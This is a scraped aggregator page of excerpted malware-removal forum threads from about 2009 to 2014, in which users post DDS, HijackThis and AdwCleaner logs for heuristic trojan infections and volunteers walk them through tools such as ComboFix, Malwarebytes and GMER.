Virus Name: [email protected]
Message on pop-up screen: Fatal Error 1001 and 1022
The following subjects were identified:
atdmt.cookie
cgi-bin cookie
Specificclick cookie
yieldmanager cookie
Ask.com cookie:
quentserve cookie

A:Trojan.heur

It sounds like you need help with cleaning out malware,virus go here

http://www.techsupportforum.com/secu...oval-help.html

After running through all the steps, please post the requested logs in the Virus/Trojan/Spyware Help forum, not here.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.

2 more replies
Answer Match 52.08%

My Windows XP computer is infected with Gen:Trojan.Heur.P207887C7C7 virus. It is stuck in C/windows/system32/tegonaru.dll.

I used BitDefender 2009 to quarantine it, but couls not delete it. My computer is still deadly slow.

I have tried the following, but no luck yet:

System Restore
BitDefender 2009
SuperAntiSpy
Malaware
SpyBot (keeps crashing before I can use it)
McAfee Stinger (still running it as we speak)

Any other suggestions?

A:Gen:Trojan.Heur.P207887C7C7

Moved from HJT forum to more appropriate.

6 more replies
Answer Match 52.08%

After updating its virus signatures, NOD32 detected a BHO.NLN (no relation to my username) trojan inside my SysWOW64 directory in the form of XWR18467.DLL. I then proceeded to scan the entire Windows directory with NOD32 and it detected one more DLL infected, wr18467.dll without the X! That time it couldn't quarantine the DLL.

I then went inside the SysWOW64 directory and there were many copies of executables from a program I downloaded a while ago inside the directory! They were named xa155881237.exe, xa155877103.exe, xa155870489.exe, etc. That must be the culprit. I scanned one of them with http://virusscan.jotti.org/ and a few programs said it was Heur.W32.

In all honesty it was from a NoCD patch I got for a game a few days ago (remove SecuROM DRM which is even worse than viruses :D).

I am having no negative symptoms on my computer... yet... but I'm afraid it might be part of a botnet or something.

What am I to do?


Quote:




C:\Windows\SysWOW64\wr18467.dll - Win32/BHO.NLN trojan





Code:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:22:38 PM, on 1/19/2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
D:\Vista\Program Files (x86)\Dropbox\dropbox.exe
D:\Vista\Program Files (x86)\RivaTuner v2.21\RivaTuner.exe
D:\Vista\Program Files (x86)\mIRC\mirc.exe
C:\Users\Mike\AppData\Local\Google\Update\GoogleUpdate.exe
D:\Vist... Read more

A:Heur.W32 and BHO.NLN trojan - Help! Windows XP x64

Hello and welcome to TSF.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a
Quote:




Having problems with spyware and pop-ups? First Steps




link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

1 more replies
Answer Match 52.08%

Hi,

AVG keeps popping up that I have a win32/heur in c:\windows\system32\spoolsv.exe and a generic14.all4 trojan horse in c:\system volume information\_restore

Below you will find the dds information. Any help would be greatly appreciated.



DDS (Ver_09-07-30.01) - NTFSx86
Run by Kenny at 11:01:45.00 on Thu 09/17/2009
Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_15
Microsoft Windows XP Home Edition 5.1.2600.2.1252.1.1033.18.2038.1300 [GMT -4:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\brsvc01a.exe
C:\WINDOWS\system32\brss01a.exe
svchost.exe
C:\WINDOWS\System32\KLServer.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\WINDOWS\System32\ppmon.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Microsoft SQL Server\MSSQL$ASSET\Binn\sqlservr.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\WLTRAY.exe
C:\WINDOWS\s... Read more

A:Win32/Heur & Trojan

Hi,

Please do the following:


Download ComboFix from one of the following locations:
Link 1
Link 2

VERY IMPORTANT !!! Save ComboFix.exe to your Desktop

* IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here Double click on ComboFix.exe & follow the prompts.
As part of it's process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. With malware infections being as they are today, it's strongly recommended to have this pre-installed on your machine before doing any malware removal. It will allow you to boot up into a special recovery/repair mode that will allow us to more easily help you should your computer have a problem after an attempted removal of malware.
Follow the prompts to allow ComboFix to download and install the Microsoft Windows Recovery Console, and when prompted, agree to the End-User License Agreement to install the Microsoft Windows Recovery Console.
**Please note: If the Microsoft Windows Recovery Console is already installed, ComboFix will continue it's malware removal procedures.


Once the Microsoft Windows Recovery Console is installed using ComboFix, you should see the following message:


Click on Yes, to continue scanning for malware.
When finished, it ... Read more

2 more replies
Answer Match 52.08%

I'm not sure how this got posted as a new topic.. I clicked to reply to a previous topic with the same virus Oo

Basically I have this virus on my computer at the moment, and it's completely messed up... when I load up the computer it displays only the desktop background, none of the desktop short cuts or taskbar at the bottom load up.

The only way I can start any programs is by opening the Task Manager with Ctrl+Alt+Delete, and selecting the program from the list. However Internet Explorer and Firefox won't open, so I can't download the malware program that was in the other topic to solve my problem...

I was prepared to format my hard drive after saving all the files I wanted to an external hard drive, but it won't even let me do that... it comes up with an error saying the drive is in use or something, and so won't format... I don't know what else to do ><

If anyone knows of a way to solve the problem, then it'll be much appreciated. I would even be happy with another way to format my hard drive, one that works that is heh.

Thanks for any help

A:Gen:Trojan.Heur.P207887C7C7

Try this scan. You can copy it over from another computer on a CD or pen drive if you need to.Before we start fixing anything you should print out these instructions or copy them to a NotePad file so they will be accessible. Some steps will require you to disconnect from the Internet or use Safe Mode and you will not have access to this page.Please download DrWeb-CureIt and save it to your desktop. DO NOT perform a scan yet.Reboot your computer in "Safe Mode" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode".Scan with Dr.Web CureIt as follows:Double-click on drweb-cureit.exe to open the program and click Start. (There is no need to update if you just downloaded the most current versionRead the Virus check by DrWeb scanner prompt and click Ok where asked to Start scan now? Allow the setup.exe to load if asked by any of your security programs.The Express scan will automatically begin.
(This is a short scan of files currently running in memory, boot sectors, and targeted folders).If prompted to dowload the Full version Free Trial, ignore and click the X to close the window.If an infected object is found, you will be prompted to move anything that cannot be cured. Click Yes to All.When complete, click Select All... Read more

6 more replies
Answer Match 52.08%

Hello,

My computer has slowed down quite a bit and it seems my Kaspersky Internet Security is not able to get rid of a Heur Trojan Win.32 virus. I am hoping someone more tech savvy can help me out. I hope I have posted the information anyone would need to help me out. Thanks to all in advance.


DDS (Ver_09-05-14.01) - NTFSx86
Run by Kevin at 5:15:44.92 on Sun 05/24/2009
Internet Explorer: 6.0.2900.5512 BrowserJavaVersion: 1.6.0_07
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.2046.1450 [GMT -7:00]

AV: Kaspersky Internet Security *On-access scanning enabled* (Updated) {2C4D4BC6-0793-4956-A9F9-E252435469C0}
FW: Kaspersky Internet Security *enabled* {2C4D4BC6-0793-4956-A9F9-E252435469C0}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\WINDOWS\system32\bgsvcgen.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\IoctlSvc.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\PROGRA~1\S... Read more

A:Need Help with HEUR Trojan Win.32 virus

Hello -

Does Kaspersky give an exact location for this threat? Full file name and path? Registry location? I'm not seeing anything particularly malicious in those logs.

11 more replies
Answer Match 52.08%

Hi everyone!
My computer is infected with various Trojans but the most problematic of all is Gen:Trojan.Heur.Vundo.1

I'm running Windows Xp Pro sp3 and about 2 weeks ago my antivirus, BitDefender 2009, detected a number of infected "system32" files and put them in Quarantine. One of the virus was (and still is) Trojan.Vundo.GGW. I hold it responsible for all the difficulties we've been facing when surfing the Internet. Internet Explorer 7 (IE) would start opening an endless number of blank tabs after running normally for a while whereas Mozilla Firefox (MF) wouldn't open at all.
We've installed Spybot and managed to get rid of some of the infected files but the Trojans are still hiding and operating. Today I turned off system restore points, rebooted in safe mode, scanned the machine with SpyBot yet again, fixed the issues it found, booted Windows and enabled the system restore points. Even though I haven't yet tried IE, I must say, MF opens without having to switch off the AntiVirus.
The last I checked, there were some 96+ files infected by Trojan.Heur.Vundo.1 in Quarantine. I suspect this Trojan is an evolution of two other Trojans which the AV detected 2 weeks ago (Trojan.Heur.13 + Trojan.Vundo.GGw) and are still present in my computer.

As the list of infected/quantined files gets longer and longer, I read and followed the Instructions posted in this forum:backed up important files
uninstall any cracked applications and p2p programs
downloaded and ran ... Read more

A:Gen:Trojan.Heur.Vundo.1

Hi, welcome to TSF!

Please rename GMER to KMER then re-run it.

Post the log please.

19 more replies
Answer Match 52.08%

Ok so I did a free virus scan with BitDefender Online and they found that I'm infected with - Gen:[email protected] in c:/windows/system32/stparaph.dll They can't remove it or clean it and when I look for the file, its not there even though I have my setting set to view all hidden files & folders. I did a search online but cant' find any info on it.. PLEASE HELP.. What is it and more importantly How do I get rid of it? Any help is appreciated.. Thank you!!!


Good evening. Please work through the instructions here and then start a new tread and post accordingly. As Helpers look for threads with zero replies i'll lock this one.

1 more replies
Answer Match 52.08%

Hello~
I've been having problems with my computer for a little while now, its a bit complicated.

I've had this trojan for a little while and have been working here and there but cant seem to get to it and remove it.
It hasnt been a pest, until recently I downloaded a program called "Workspace Macro Pro 6.0"

I have BitDefender 2009 with everything updated, I recently ran a scan and it finds the trojan but says it cant remove it.
I also have RegCure, A registry cleaner, I run it about every day. I have TuneUp Utilities 2009, and have done the things it says except A few Visual Effects I cant seem to change.
I play games alot and it practically freezes whenever I do anything other than walk, its really bugging me

Also, the trojan was found in System Volume Information, I changed the folder options to show everything but the Folder is empty.

If can help I'd appreciate it, is there anything else I need to post?
Edit: I just thought to say, I run Windows XP Home Edition with Service Pack 2

A:Gen:Trojan.Heur.3000617435

Let's disable those programs or not load them, they will just interfer with cleaning the infection.Agreed?Please download Malwarebytes Anti-Malware (v1.38) and save it to your desktop.alternate download link 1alternate download link 2If you have a previous version of MBAM, remove it via Add/Remove Programs and download a fresh copy.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install. Alternatively, you can update through MBAM's interface from a clean computer, copy the definitions (rules.ref) located in C:\Documents and Settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware from that system to a usb stick or CD and then copy it to the infected machine.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all... Read more

8 more replies
Answer Match 52.08%

right folks ive have a trojan on my laptop a win32 heur


ive downloaded and ran c/ cleaner, avg8.0, trojan hunter, spybot search

and destroy and the rat is still lurking on my comp.

ive ran all scans deleted the threats, turned off system restore before

rebooting still no luck,

has anyone came across this, as ive said tried the obvious and had no

luck

if anyone could help it would be much appreciated

A:trojan help: win32/heur

Hello, spb
Welcome to TSF

My name is Billy O'Neal and I will be helping you. (Billy or Bill is fine, if you like.)
Please give me some time to look over your computer's log(s).
Please take note of the following:In the meantime, please refrain from making any changes to your computer.
Also, even if things appear to be running better, there is no guarantee that everything is finished. Please continue to check this forum post in order to ensure we get your system completely clean. We do not want to clean you part-way up, only to have the system re-infect itself. :)
If you do not understand any step(s) provided, please do not hesitate to ask before continuing. I would much rather clarify instructions or explain them differently than have something important broken.
Finally, please reply using the button in the lower left hand corner of your screen.
Old topics are closed after 3 days with no reply, and working topics are closed after 5 days. If for any reason you cannot complete instructions within that time, that's fine, just put a post here so that I know you're still here. We get a lot of people who simply leave, and if there is no contact for that amount of time I will have to assume you have "vanished" .

We need to create an OTViewIt ReportPlease download OTViewIt by OldTimer.
Save it to your desktop.
Double click on the icon on your desktop.
Click the "Scan All Users" checkbox.
Push the button.
Two reports will open, copy and paste them in a repl... Read more

2 more replies
Answer Match 52.08%

I ran bitdefender 2009 and it find this but can't remove it. My computer is running very slow when I click the start menu it just shows the outline of the box, now text. Same in outlook if you try to pull down any menus. I also ran PCcillian and it said it removed it, but it is still there. My computer runs Windows XP

Here is my DDS file


DDS (Ver_09-01-07.01) - NTFSx86
Run by TParker at 1222.28 on Thu 01/29/2009
Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_05
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.997.478 [GMT -5:00]

AV: BitDefender Antivirus *On-access scanning enabled* (Updated)
FW: BitDefender Firewall *enabled*

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\STacSV.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Microsoft IntelliType Pro\itype.exe
C:\Program Files\Microsoft IntelliPoint\ipoint.exe
C:\WINDOWS\sttray.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\Program Files\BitDefender\BitDefender 2009\bdagent.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Prog... Read more

A:Gen:Trojan.Heur.Vundo.1

Hi spensmom90

Please read this post completely before begining the fix. If there's anything that you do not understand, kindly ask your questions before proceeding. Please ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this webpage would not be available when you're carrying out the fix.

We also suggest that you Subscribe to this thread to be notified of fixes as soon as they are posted by our Team. You can do this simply by clicking the "Thread Tools" button located in the original thread line and selecting "Subscribe to this Thread".

IT IS IMPORTANT THAT YOU DON'T MISS A STEP & PERFORM EVERYTHING IN THE RIGHT ORDER.

===============================================

Download Combofix from the link below, and save it to your desktop. For information regarding this download, please visit this webpage: http://www.bleepingcomputer.com/comb...o-use-combofix

Download ComboFix


**Note: It is important that it is saved directly to your desktop**

===========================================

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

===========================================

Double click on ComboFix.exe & follow the prompts.When finished, it will produce a report for you.
Please post the C:\ComboFix.txt for further review.
Note:
Do... Read more

1 more replies
Answer Match 52.08%

Good afternoon,
a few days ago a Heur trojan virus affected my pc and I don't know what do do in order to delete it. Also, at the same time, it may not be the only virus in my computer even if I'm not completely sure about it.
I'm also attaching my DDS cause I can't open it any more.
Please help me
Thank you very much.

A:Virus HEUR trojan win 32

Sorry, I forgot to upload the files.

Here's the DDS:

.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 1.6.0_26
Run by UTENTE at 21:57:35 on 2012-03-30
Microsoft? Windows Vista? Business 6.0.6002.2.1252.39.1040.18.3066.1308 [GMT 2:00]
.
AV: Kaspersky Internet Security *Enabled/Updated* {56547CC9-C9B2-849D-8FEF-A496150D6A06}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Kaspersky Internet Security *Enabled/Updated* {ED359D2D-EF88-8B13-B55F-9FE46E8A20BB}
FW: Kaspersky Internet Security *Enabled* {6E6FFDEC-83DD-85C5-A4B0-0DA3EBDE2D7D}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\Ati2evxx.exe
C:\Windows\system32\Dwm.exe
C:\Windows\explorer.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe
C:\Program Files\NewTech Infosystems\NTI Back... Read more

5 more replies
Answer Match 52.08%

Hi folks, my name is Nate, thanks for taking the time to read this.Recently my computer seems to have gotten infected with the Heur trojan. I am by no means inept with computers but when it comes to code or analyzing stuff like this I am left clueless. So, after a few days of unsuccessful attempts to rid myself of the virus, I've turned to the experts. Attach.txt has been attached.I think I've follow the directions pretty closely, so here is the DDS info it says to copy and paste:PS Although it didn't call for it, I think you guys will need the hijackthis log, I will copy that as well. Also, the AVG 8.0 FREE results.Thank you very much! I've managed to get my system partially stable but I do not want to take any further action because this stuff might as well be in a foreign language as far as I'm concerned. As mentioned, the system appears to be somewhat stable, I get wierd errors on startup, and AVG constantly says I have an infection. In any case, here is the info and thanks again.DDS LOG:DDS (Ver_09-03-16.01) - NTFSx86 Run by Nathan at 15:25:24.52 on Thu 04/09/2009Internet Explorer: 6.0.2900.5512AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)============== Running Processes ============================= Pseudo HJT Report ===============uStart Page = hxxp://www.google.com/BHO: c:\windows\system32\ds43g4nfjkn93.dll: {d5bf49a0-94f3-42bd-f434-3604812c8955} - c:\windows\system32\ds43g4nfjkn93.dllTB: AVG Security Toolba... Read more

A:Heur trojan/virus

Hello! My name is Sam and I will be helping you. In order to see what's going on with your computer I will ask for you to post various logs from the tools that we will use to resolve your issue. Please also share with me any information about how your computer is reacting and behaving each step of the way as we work through this process.We need to create an OTListIt2 ReportPlease download OTListIt2 from hereSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.Push the "Run Scan" button.The scan should take just a few minutes.Copy the log that opens up and paste it back here in your next reply.=============The next log will show us any hidden files that are present.Download GMER from here:Unzip it to the desktop.Open the program and click on the Rootkit tab.Make sure all the boxes on the right of the screen are checked, EXCEPT for ?Show All?.Click on Scan.When the scan has run click Copy and paste the results (if any) into this thread.

2 more replies
Answer Match 52.08%

I am running WIN XP SP3 (updated) and have BitDefender as my AV. Lately, svchost.exe is being quarantined from randomly named \windows\temp folders. I experience occasional surfing problems (webpage not available) and a slight system slowdown. Any help removing this trojan shall be much appreciated. Here's my log:
DDS (Ver_09-12-01.01) - NTFSx86
Run by H&V at 4:52:35.20 on 15/12/2009
Internet Explorer: 8.0.6001.18702
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2038.1471 [GMT 5.5:30]

AV: BitDefender Antivirus *On-access scanning enabled* (Updated) {6C4BB89C-B0ED-4F41-A29C-4373888923BB}
FW: BitDefender Firewall *enabled* {4055920F-2E99-48A8-A270-4243D2B8F242}

============== Running Processes ===============

D:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
D:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
D:\Program Files\BitDefender\BitDefender 2009\vsserv.exe
D:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
D:\WINDOWS\system32\spoolsv.exe
svchost.exe
D:\Program Files\Common Files\Portrait Displays\Shared\DTSRVC.exe
D:\WINDOWS\system32\FsUsbExService.Exe
D:\Program Files\Java\jre6\bin\jqs.exe
D:\Program Files\Common Files\Portrait Displays\Drivers\pdisrvc.exe
D:\WINDOWS\system32\svchost.ex... Read more

A:Gen:Trojan.Heur.ImKfzKZUtpoi

Welcome to the BleepingComputer Forums. Since it has been a few days since you scanned your computer with HijackThis, we will need a new HijackThis log. If you have not already downloaded Random's System Information Tool (RSIT), please download Random's System Information Tool (RSIT) by random/random which includes a HijackThis log and save it to your desktop. If you have RSIT already on your computer, please run it again. Double click on RSIT.exe to run RSIT. Click Continue at the disclaimer screen. Please post the contents of log.txt. Thank you for your patience.Please see Preparation Guide for use before posting about your potential Malware problem. If you have already posted this log at another forum or if you decide to seek help at another forum, please let us know. There is a shortage of helpers and taking the time of two volunteer helpers means that someone else may not be helped. Please post your HijackThis log as a reply to this thread and not as an attachment. I am always leery of opening attachments so I always request that HijackThis logs are to be posted as a reply to the thread. I do not think that you are attaching anything scary but others may do so. While we are working on your HijackThis log, please: Reply to this thread; do not start another! Do not make any changes on your computer during the cleaning process or download/add programs on your computer unless instructed to do so. Do not run any other tool until ... Read more

2 more replies
Answer Match 51.66%

hey guysI got infected by that damn Trojan it messed up my comp... no browsers would work apart from Google Chrome.. im lucky that i had it installed otherwise I wouldnt be able to use internetAvast and AVG have failed to worrk on my comp! Even MSN crashes... So i used Win32kDiag and I'm enclosing the latest log file so you can have a look at itand by the way i got the url of website where i got that damn Trojan any ethical hackers on forums would fancy taking that site down ?


Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Answer Match 51.66%

Ok everyone let me see here I am not computer techie, but know a little bit. I got this nasty virus Gen Trojan Heur Vundo 1, and need to correct this. I am using my laptop for now. .I have WINDOWS XP 32 bit, DELL DEMENSION E310, and i was trying to get Avira Anti-Virus and Malware bytes to work on my desktop. I had MSE (Microsoft Security Essentails that was working untill virus got through) after that i cannot run any anti virus like Avira free anti virus, Malware Bytes. All my browsers keep popping up with IE.exe or Firefox.exe needs to close and when i close them the windows close as well. System Restore i cannot do. I go to safe mode and get BLUE SCREEN error code: run chkdsk /f then error codes of 0X0000007B, 0XF7B64524,0XC0000034,0X00000000, 0X00000000. i CAN boot in regular mode just not in safe mode or safe mode w/ networking. BTW I have malware bytes in my add/remove programs but i cannot uninstall to reinstall. What i have tried:1. to scan with safety.live.com no luck i get to 8 of 11 files installed and computer stops/freezes.2. Reinstall malware bytes, and avira freeware anti virus, they install but don't run.3. my frein d told me to try CC Cleaner to check and cleaner and check registry.. no luck.4. We have had some ice storms here in western Iowa so i have been in and out of power past 3 days and now desktop boots and freezes after few seconds.Kinda getting mad but not sure what to do. Thank You in advance for any help that can be useful for me. BTW i t... Read more

A:got a virus Gen Trojan Heur Vundo 1

Member has solved their problem
Topic closed

1 more replies
Answer Match 51.66%

Hello PSL649 I would like to welcome you to the Malware Removal section of the forum.Around here they call me Gringo and I will be glad to help you with your malware problems.Very Important --> Please read this post completely, I have spent my time to put together somethings for you to keep in mind while I am helping you to make things go easier, faster and smoother for both of us!Please do not run any tools unless instructed to do so.We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.Please do not attach logs or use code boxes, just copy and paste the text.Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.Please read every post completely before doing anything.Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.Please provide feedback about your experience as we go.A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", ... Read more

A:HEUR.Trojan.Win32.Generic.

Gringo,
 
JRT will not run.  I tried to run this yesterday let it sit for 5 hours and no report.  Tried to run it in user mode, does not run like that either.  After running the Adwcleaner my fan speed had returned to normal and the system seems to be normal also.  The svchosts.exe (LocalServiceNoImpersonation) has normalized and not pegging at 99% anymore & svchosts.exe (LocalServicePeerNet) is no longer seen(which was also at 99%)
 
Here is the AdwCleaner Report:
 
# AdwCleaner v3.022 - Report created 22/03/2014 at 00:41:58
# Updated 13/03/2014 by Xplode
# Operating System : Windows 7 Ultimate Service Pack 1 (64 bits)
# Username : d15k0n - AZZA
# Running from : C:\Users\d15k0n\Desktop\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\Users\d15k0n\Documents\Mobogenie
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3408AC0D-510E-4808-8F7B-6B70B1F88534}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3408AC0D-510E-4808-8F7B-6B70B1F88534}
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.16521
 
 
-\\ Mozilla Firefox v27.0.1 (en-US)
 
[ Fil... Read more

22 more replies
Answer Match 51.66%

I do not know how to get this virus off my computer. The file name is Inchtour.exe - it makes my disc drive open on it's own, and has taken over my Bit Defender account. It will not even start my Bit Defender program unless I go into the settings and specifically watch the antivirus settings section. There is no specific message that I receive from the Bit Defender program but it tells me that I have 3 viruses that cannot be removed.
DDS (Ver_09-03-16.01) - NTFSx86
Run by Heidi Cote at 23:01:23.35 on 25/04/2009
Internet Explorer: 7.0.6001.18000
Microsoft? Windows Vista? Home Premium 6.0.6001.1.1252.2.1033.18.3006.1817 [GMT -4:00]

AV: Bitdefender Antivirus *On-access scanning enabled* (Updated)
FW: Bitdefender Firewall *enabled*

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C... Read more

A:Infected with Gen:Trojan.Heur.7E49283939

Hello Heidihatesviruses,Please disable any running anti-virus program before running Kaspersky Online Scanner.If you are unsure how to do this, see this topic: http://www.bleepingcomputer.com/forums/t/114351/how-to-temporarily-disable-your-anti-virus-firewall-and-anti-malware-programs/Close any open browsersPlease do a scan with Kaspersky Online ScannerYou can refer to this animation by sundavis.Note: If you are using Windows Vista, open your browser by right-clicking on its icon and select 'Run as administrator' to perform this scan.Click on the Accept button and install any components it needs.The program will install and then begin downloading the latest definition files.After the files have been downloaded on the left side of the page in the Scan section select My Computer.This will start the program and scan your system.The scan will take a while, so be patient and let it run.Once the scan is complete, click on View scan reportNow, click on the Save Report as button.In the drop down box labeled Files of type change the type to Text file.Save the file to your desktop.Copy and paste that information in your next post.This scanner will only scan. It does not remove any malware it finds.**************Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update. Updating Java: Download the latest version of Java SE Runtime Environment (JRE) 6 Update ... Read more

2 more replies
Answer Match 51.66%

Godfadda, I need your help

